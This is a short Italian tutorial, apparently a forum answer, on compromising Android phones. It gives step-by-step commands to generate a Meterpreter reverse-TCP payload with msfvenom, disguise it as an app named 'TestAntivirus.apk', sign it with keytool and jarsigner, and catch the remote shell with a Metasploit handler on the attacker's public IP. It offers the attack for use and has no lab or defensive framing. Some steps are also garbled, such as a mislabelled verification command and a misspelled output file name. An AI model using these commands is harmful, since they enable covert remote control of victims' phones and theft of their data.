Inanzitutto,verifica se la tua macchina e in NAT o in Bridge. Se sei sotto NAT devi passare in modalità Bridge.
Per creare il payload fai così:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[INDIRIZZO IP PUBBLICO] LPORT=[LA PORTA CHE HAI FORWARDATO] R> TestAntivirus.apk
Dopo aver creato il file APK bisogna firmare un certificato,perché i dispositivi android non permettono l’installazione di app senza il certificato appropriato,poiché vengono installati solo file .apk firmati.
Per firmare il file .apk usa questo comando:
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
Dopo procedi così:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore TestAntivirus.apk hacked
Poi firma l’apk con JARsigner:
jarsigner -verify -verbose -certs TestAntivirus.apk
Dopo di che installa Zipalign:
apt-get install zipalign
zipalign -V 4 TestAntivirus.apk signed_jar.apk
Adesso hai firmato il tuo file .apk,Però lo troverai con il nome di singed_jar.apk.
Fatto ciò sei pronto a procedere con Metasploit:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST [IP DELLA MACCHINA ATTACCANTE]
set LPORT [PORTA FORWARDATA]
exploit -j
Spero di esserti stato di aiuto